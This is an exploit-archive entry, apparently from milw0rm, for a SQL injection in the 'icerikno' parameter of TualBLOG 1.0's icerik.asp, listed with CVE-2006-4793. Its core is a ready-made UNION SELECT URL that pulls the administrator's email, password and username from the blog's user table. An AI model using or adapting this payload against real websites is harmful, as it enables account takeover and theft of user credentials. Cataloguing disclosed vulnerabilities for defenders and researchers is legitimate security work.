TualBLOG 1.0 - 'icerikno' SQL Injection
Author: RMx type: webapps platform: asp port: date_added: 2006-09-12 date_updated: verified: 1 codes: OSVDB-28787;CVE-2006-4793 tags: aliases: screenshot_url: application_url: raw file: 2362.txt
# BiyoSecurity.Org # script name : TualBLOG v 1.0 # Risk : High # Regards : Dj ReMix # Thanks : Korsan , Liz0zim # Vulnerable file : icerik.asp exp : http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1 uyeno = 1 or 2( Admin ID ) # milw0rm.com [2006-09-13]